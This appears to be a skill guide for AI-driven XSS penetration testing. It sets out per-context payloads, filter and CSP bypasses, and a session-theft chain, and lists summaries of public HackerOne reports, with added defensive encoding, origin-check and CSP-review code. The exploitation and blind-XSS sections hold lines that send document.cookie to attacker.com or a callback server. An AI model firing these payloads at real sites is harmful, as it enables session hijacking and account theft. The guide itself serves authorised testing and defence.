# XSS Penetration Testing Patterns

Load this Skill when performing XSS penetration testing against a web application. It covers attack techniques for Stored, Reflected, and DOM-based XSS.
## Attack Surface Discovery

High-risk input points:

- Search boxes, comment/guestbook features, profile editing (display name, bio)
- URL parameters reflected directly into the page (`?message=`, `?error=`, `?callback=`)
- Rich-text editors, Markdown renderers
- File upload (SVG, HTML files)
- API responses rendered by the front end (HTML fields inside JSON)
- Third-party integration callbacks (OAuth `redirect_uri`, webhooks)

DOM-based XSS entry points:

- `location.hash` / `location.search` consumed by `document.write()` or `innerHTML`
- `postMessage` handlers without origin validation
- Client-side template engines (AngularJS `{{ }}`, Vue `v-html`)
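The two DOM entry points above, `postMessage` without an origin check and `location.hash` flowing into `innerHTML`, are easiest to understand next to their fixed forms. The following is an added example written for this page, not code from the original skill file; the names (`ALLOWED_ORIGINS`, `handleMessage`, `renderHashGreeting`, `fakeElement`) and the sample events are hypothetical and constructed, and a plain object stands in for a DOM element so the file runs under Node.

```javascript
'use strict';
// Added example, not from the original skill file. All names are hypothetical.

// Origins allowed to message this window. Exact match on the full origin string;
// prefix or substring checks are the classic way this validation goes wrong.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']); // assumed origin

function isTrustedOrigin(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// The vulnerable pattern the page describes: any sender is trusted and the
// message body is written straight into a DOM sink.
function vulnerableHandler(event, target) {
  target.innerHTML = event.data;
  return target;
}

// Hardened handler: check event.origin first, accept only the message shape the
// application expects, and write through textContent so markup stays inert.
function handleMessage(event, target) {
  if (!isTrustedOrigin(event.origin)) {
    return { handled: false, reason: 'untrusted origin' };
  }
  const data = event.data;
  if (typeof data !== 'object' || data === null ||
      data.type !== 'greet' || typeof data.name !== 'string') {
    return { handled: false, reason: 'unexpected message shape' };
  }
  target.textContent = `Hello, ${data.name}`;
  return { handled: true };
}

// location.hash entry point: decode the fragment, then treat it as text only.
// Never hand it to innerHTML or document.write().
function renderHashGreeting(hash, target) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  let value;
  try { value = decodeURIComponent(raw); } catch { value = ''; }
  target.textContent = value;
  return target.textContent;
}

// Stand-in for a DOM element so the example runs outside a browser. In a page you
// would pass a real element and register the handler with
// window.addEventListener('message', (e) => handleMessage(e, el)).
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

// Constructed sample events (not captured from any real site).
const hostileEvent = { origin: 'https://evil.example', data: '<img src=x onerror=alert(1)>' };
const friendlyEvent = { origin: 'https://app.example.com', data: { type: 'greet', name: 'Ada' } };
```

The origin check alone is not enough: a trusted origin can still relay untrusted content, which is why the hardened handler also validates the message shape and uses a text sink.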
Identification signals:

- The input value appears verbatim in the response HTML (no encoding)
- API responses served with `Content-Type: text/html`
- Missing `Content-Security-Policy` header
- The reflected parameter lands inside an HTML attribute, a JavaScript block, or a URL
## Exploitation Techniques

Build the payload for the injection context:

```html
<!-- HTML context -->
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<details open ontoggle=alert(1)>

<!-- Attribute context -->
" onfocus=alert(1) autofocus="
' onmouseover='alert(1)

<!-- JavaScript context -->
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//

<!-- URL context -->
javascript:alert(1)
data:text/html,<script>alert(1)</script>
```
Stored XSS exploitation chain:

- Inject the payload into a profile, article, or comment
- It fires when other users or an administrator view the content
- Steal the session cookie: `fetch('https://attacker.com/steal?c='+document.cookie)`
- Use the administrator's session to act in the back office
Filter bypass techniques:

- Mixed case: `<ScRiPt>alert(1)</ScRiPt>`
- Alternative event handlers: `onerror`, `onload`, `onfocus`, `ontoggle`, `onanimationend`
- Encoding bypass: HTML entities (`alert(1)` with entity-encoded characters), Unicode escapes `\u0061lert(1)`
- Tag variants: `<svg>`, `<math>`, `<details>`, `<marquee>`
- Execution without parentheses: `` .constructor.constructor`('alert(1)') ``
- Reader Mode / special rendering mode injection (e.g. nonce abuse in a browser's Reader Mode)
- Mutation XSS (mXSS): exploits differences between the browser's DOM parsing and serialization; the payload mutates into executable script after an `innerHTML` assignment
- Markdown injection: `[link](javascript:alert(1))`
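The per-context payloads and the bypass list above make the same point from the defender's side: a blocklist that strips a few strings loses to case changes, alternative tags, and alternative schemes, while encoding the output for the exact context it lands in does not care which variant was used. The block below is an added example written for this page, not code from the original skill file. Every function name (`naiveBlocklist`, `encodeHtml`, `attr`, `encodeJsString`, `safeUrl`, `safeLink`) is hypothetical, the base origin `https://example.com/` is assumed, and the sample inputs are the page's own payloads.

```javascript
'use strict';
// Added example, not from the original skill file. All names are hypothetical.

// The kind of "strip <script>" filter that the bypass list above walks past.
// Constructed for illustration; do not ship anything like it.
function naiveBlocklist(input) {
  return input.replace(/<script>|<\/script>|javascript:/g, '');
}

// HTML body context: markup characters become entities, so <img onerror=...> is text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Attribute context: always quote the value and entity-encode the quote, so
// `" onfocus=alert(1) autofocus="` cannot close the attribute. Event-handler
// attribute names are refused outright because their value is code, not text.
function attr(name, value) {
  if (!/^[a-zA-Z][\w-]*$/.test(name) || /^on/i.test(name)) {
    throw new Error('refusing to emit attribute ' + name);
  }
  return `${name}="${encodeHtml(value)}"`;
}

// JavaScript string context: JSON.stringify escapes quotes and backslashes; the
// extra replacements stop `</script>` from ending the script block and keep
// U+2028/U+2029 from terminating a JavaScript line.
function encodeJsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\//g, '\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// URL context: let the WHATWG URL parser normalise the scheme (it lowercases and
// strips tab/newline tricks), then allow only the schemes the page needs.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeUrl(value, base = 'https://example.com/') { // base: assumed site origin
  let url;
  try { url = new URL(String(value), base); } catch { return null; }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// What a Markdown renderer should do with [text](href): a rejected scheme is
// rendered as plain text instead of a link.
function safeLink(href, text) {
  const url = safeUrl(href);
  if (url === null) return encodeHtml(text);
  return `<a ${attr('href', url)} rel="noopener noreferrer">${encodeHtml(text)}</a>`;
}

// Constructed inputs: the page's own context payloads and bypass variants.
const SAMPLES = {
  html: '<img src=x onerror=alert(1)>',
  mixedCase: '<ScRiPt>alert(1)</ScRiPt>',
  svg: '<svg/onload=alert(1)>',
  attribute: '" onfocus=alert(1) autofocus="',
  jsBlock: '</script><script>alert(1)</script>',
  jsQuote: "\\'-alert(1)//",
  url: 'javascript:alert(1)',
  urlMixed: 'JaVaScRiPt:alert(1)',
  dataUrl: 'data:text/html,<script>alert(1)</script>',
  markdownLink: ['javascript:alert(1)', 'link'],
};
```

The encoders are only correct for the context named in their comment: `encodeHtml` output is not safe inside a `<script>` block, and `encodeJsString` output is not safe inside an HTML attribute unless it is attribute-encoded as well. When a value crosses two contexts, apply both encoders in the order the browser will decode them.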
Blind XSS:

```html
<!-- Inject into locations rendered in a back office: support tickets, feedback forms, log viewers -->
"><script src=https://your-callback-server/hook.js></script>
<img src=x onerror="fetch('https://callback.server/'+document.cookie)">
```

- Use XSS Hunter or a self-hosted callback server to detect the trigger
- Common injection points: User-Agent, Referer, and form fields that are rendered in the admin back office
CSP bypass:

- `script-src 'unsafe-inline'`: inline scripts execute directly
- JSONP endpoints: `<script src="trusted.com/jsonp?callback=alert">`
- Base URI injection: `<base href="https://attacker.com/">`
- Abusing a CDN that is on the `script-src` allowlist
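Each CSP bypass above corresponds to a policy setting that can be read straight off the header, so a reviewer can triage a policy before testing it by hand. The following is an added example written for this page, not code from the original skill file: `parseCsp` and `reviewCsp` are hypothetical names and the sample headers are constructed. It flags `'unsafe-inline'` (unless a nonce or hash is present, which makes CSP2-aware browsers ignore it), a missing `base-uri`, and any host allowlist, which still has to be checked by hand for JSONP endpoints and user-uploadable CDN paths.

```javascript
'use strict';
// Added example, not from the original skill file. Names are hypothetical.

// Split a Content-Security-Policy header into directive -> source list. Tokens
// are lowercased for keyword comparison only (nonce values are never reused).
// Per the spec a repeated directive is ignored, so the first occurrence wins.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!policy.has(name)) policy.set(name, tokens.slice(1).map((t) => t.toLowerCase()));
  }
  return policy;
}

// Findings that map to the CSP bypass list. An empty result means none of those
// patterns apply, not that the policy is proven safe.
function reviewCsp(header) {
  if (!header || header.trim() === '') return ['no Content-Security-Policy header'];
  const findings = [];
  const policy = parseCsp(header);
  const scriptSrc = policy.get('script-src') || policy.get('default-src');

  if (!scriptSrc) {
    findings.push('no script-src and no default-src fallback: script loading is unrestricted');
  } else {
    const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    // CSP2+ browsers ignore 'unsafe-inline' once a nonce or hash is present.
    if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline': injected inline scripts run");
    }
    if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval'");
    if (scriptSrc.includes('*')) findings.push('script-src contains a bare wildcard');
    if (scriptSrc.includes('data:')) findings.push('script-src allows data: URIs');
    // Host sources: anything that is not a quoted keyword, a wildcard, or a scheme.
    const hosts = scriptSrc.filter((s) => !s.startsWith("'") && s !== '*' && !/^[a-z]+:$/.test(s));
    if (hosts.length > 0 && !scriptSrc.includes("'strict-dynamic'")) {
      findings.push(`script-src host allowlist (${hosts.join(', ')}): check each host for JSONP endpoints or CDN paths that serve user-uploaded files`);
    }
  }
  if (!policy.has('base-uri')) {
    findings.push('no base-uri: a <base href> injection can redirect relative script URLs');
  }
  if (!policy.has('object-src') && !policy.has('default-src')) {
    findings.push('no object-src and no default-src: plugin content is unrestricted');
  }
  return findings;
}

// Constructed sample headers: one with the weaknesses listed above, one nonce-based.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com";
const STRICT_CSP = "default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; base-uri 'none'; object-src 'none'";
```

The strict sample is the shape that removes the whole bypass list at once: a per-response nonce plus `'strict-dynamic'` makes the host allowlist irrelevant, and `base-uri 'none'` closes the `<base>` injection.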
## Detection Checklist

## Impact Assessment

What exploitation can achieve:

- Session hijacking: steal cookies to take over the account
- Phishing: inject a fake login form to harvest credentials
- Malicious actions: perform sensitive operations as the victim (transfers, settings changes)
- Data theft: read page content, API tokens, personal information
- Worm propagation: Stored XSS can be turned into a self-propagating worm

Severity assessment:

- Critical: Stored XSS affecting all users/administrators, session theft possible, no user interaction required
- High: Reflected XSS on a high-value page, or CSP bypass allowing arbitrary JS execution
- Medium: Self-XSS, specific user interaction required, or CSP limits the scope of exploitation
## Real-World Cases

The cases below come from publicly disclosed HackerOne reports and show how this vulnerability class appears on real targets.

### Case 1: Brave Software — New XSS vector in ReaderMode with %READER-TITLE-NONCE%

- Severity: Critical | CWE: Cross-site Scripting (XSS) - Generic
- Summary: A new XSS vulnerability was discovered in Brave iOS 1.31.1 and higher, which allowed attackers to execute malicious scripts on ReaderMode pages. The vulnerability was caused by a relaxation of the CSP...
- Report: https://hackerone.com/reports/1436142

### Case 2: Khan Academy — XSS on using the legacy "Graphie To Png" API

- Severity: Critical | CWE: Cross-site Scripting (XSS) - DOM
- Summary: The legacy "Graphie To Png" API was vulnerable to exploitation. An attacker could upload malicious graphies that included harmful SVG and JSON data. The SVG contained an `onload` attribute that execut...
- Report: https://hackerone.com/reports/2846011

### Case 3: LinkedIn — Stored XSS on LinkedIn App via iframe tag in Article

- Severity: Critical | CWE: Cross-site Scripting (XSS) - Stored
- Summary: A stored XSS vulnerability was reported in the LinkedIn Article feature, where a malicious JavaScript payload could be embedded in the URL field of an iframe. When such an article was published and ac...
- Report: https://hackerone.com/reports/2212950

### Case 5: Rocket.Chat — XSS via /api/v1/chat.postMessage

- Severity: Critical | CWE: Cross-site Scripting (XSS) - Stored
- Summary: The victim could craft a custom message using the REST API that, once seen by the observer, executed arbitrary code in the context of the client user. The vulnerability was present in the attachment f...
- Report: https://hackerone.com/reports/219957

### Case 6: 8x8 — Stored xss at https://█.8x8.com/api/█/ID

- Severity: High | CWE: Cross-site Scripting (XSS) - Stored
- Summary: A vulnerability was reported where stored data could be modified to introduce malicious JavaScript that would execute in a victim's browser when the data was retrieved. The issue was isolated to a ran...
- Report: https://hackerone.com/reports/2078490

### Case 7: AWS VDP — XSS on Amazon Aquisition: elemental

- Severity: High | CWE: Cross-site Scripting (XSS) - Reflected
- Summary: The XSS vulnerability on Amazon's acquisition of Elemental was identified and addressed. The summary provided a brief overview of the issue.
- Report: https://hackerone.com/reports/3205667

### Case 8: Acronis — Potential XSS Vulnerability in Acronis Login Callback URL

- Severity: High | CWE: Cross-site Scripting (XSS) - Generic
- Summary: The Acronis login callback URL was found to be vulnerable to cross-site scripting (XSS) attacks. The redirectUrl parameter in the URL was not properly sanitized, allowing an attacker to inject arbitra...
- Report: https://hackerone.com/reports/2611305

### Case 9: Acronis — Blind XSS on admin.acronis.com via delete account form on account.acronis.com

- Severity: High | CWE: Cross-site Scripting (XSS) - Stored
- Summary: Blind XSS vulnerability was discovered on admin.acronis.com. The vulnerability could be triggered by sending a payload during the account deletion process on account.acronis.com.
- Report: https://hackerone.com/reports/666040

### Case 10: Autodesk — Stored XSS in AREA tutorials

- Severity: High | CWE: Cross-site Scripting (XSS) - Stored
- Summary: A stored cross-site scripting (XSS) vulnerability was discovered in the AREA tutorials feature. The vulnerability could have allowed an attacker to inject malicious JavaScript code when publishing a t...
- Report: https://hackerone.com/reports/3008066